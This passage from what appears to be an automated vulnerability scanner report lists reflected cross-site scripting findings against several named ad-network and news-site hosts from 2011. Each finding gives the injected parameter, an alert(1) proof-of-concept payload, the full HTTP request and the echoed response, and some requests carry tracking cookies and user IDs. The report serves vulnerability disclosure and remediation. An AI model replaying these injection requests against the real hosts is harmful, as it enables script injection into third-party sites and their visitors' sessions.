6-2'},orgCode:'HATV',apiToken:'291A707AAEE04CCC9A00B3B498001025',name:'WPTZ - Home Page',buzzAppUrl:'http://nmp.newsgator.com/NGBUZZ/',buzzId:216931,directUrl:'http://hosted.newsgator.com/',extraArgs:{e7d35;alert(1)//9227b469b76:'1'},targetId:null});
           
           b._targetId = targetId;
           
           b.render();
       } else {
           setTimeout(function(){
               s();
           }, 50);
       }
   } catch(e){
       
   }
};
setTimeout(s, 1);
})();var bu
...[SNIP]...

1.91. http://pixel.adsafeprotected.com/jspix [anId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c2b8"-alert(1)-"845ae479775 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=1405c2b8"-alert(1)-"845ae479775&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=08823C762CB294BC2DF3AD18E0211AAB; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
olitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=1405c2b8"-alert(1)-"845ae479775&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="und
...[SNIP]...

1.92. http://pixel.adsafeprotected.com/jspix [campId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ca31"-alert(1)-"cf0726d3c5a was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=39934ca31"-alert(1)-"cf0726d3c5a HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=36BC69FFFC71D2D1FFEF9321EAC627FB; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=39934ca31"-alert(1)-"cf0726d3c5a",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p
...[SNIP]...

1.93. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8b9"-alert(1)-"d0025db5af8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=3993&9d8b9"-alert(1)-"d0025db5af8=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A8135652EFA0481F0614BB2AFFA2D7A; Path=/
Connection: keep-alive
Content-Length: 8968


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
6refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993&9d8b9"-alert(1)-"d0025db5af8=1",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if
...[SNIP]...

1.94. http://pixel.adsafeprotected.com/jspix [pubId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc52a"-alert(1)-"98c6f3dade1 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079bc52a"-alert(1)-"98c6f3dade1&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=945AF54FF3FD3C6E3DFC25EB4FF01A5D; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079bc52a"-alert(1)-"98c6f3dade1&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=
...[SNIP]...

1.95. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47500'%3balert(1)//51d2b9b58a7 was submitted in the admeld_callback parameter. This input was echoed as 47500';alert(1)//51d2b9b58a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match47500'%3balert(1)//51d2b9b58a7 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; uid=dcb84907-869e-4e7d-baf7-9761469e8965; segments_p1=eJzjYuF4vJaJi5mjMYKLheN5PyOQfDyBEShwkgNINEUAiX8g1n8fILGRAwAJqArM

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 11-Apr-2011 16:30:58 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 299

document.write('<img width="0" height="0" src="http://tag.admeld.com/match47500';alert(1)//51d2b9b58a7?admeld_adprovider_id=300&external_user_id=dcb84907-869e-4e7d-baf7-9761469e8965&Expiration=1302971478&custom_user_segments=%2C11265%2C11266%2C18531%2C18407%2C1097%2C1073%2C38627%2C1150%2C9855"/>
...[SNIP]...

1.96. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd57a"><script>alert(1)</script>0a868d8e61c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=cd57a"><script>alert(1)</script>0a868d8e61c&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:20 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=4424732433026300716&fpid=cd57a"><script>alert(1)</script>0a868d8e61c&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.97. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acee"><script>alert(1)</script>d7c2d8d54c7 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=9acee"><script>alert(1)</script>d7c2d8d54c7&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:19 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=7219586931718843848&fpid=4&nu=n&t=&sp=9acee"><script>alert(1)</script>d7c2d8d54c7&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.98. http://studio-5.financialcontent.com/worldnow [Module parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99bba'-alert(1)-'73353dd3a4c was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow?Module=snapshot99bba'-alert(1)-'73353dd3a4c&OutputMode=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:09 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:09 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 702


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
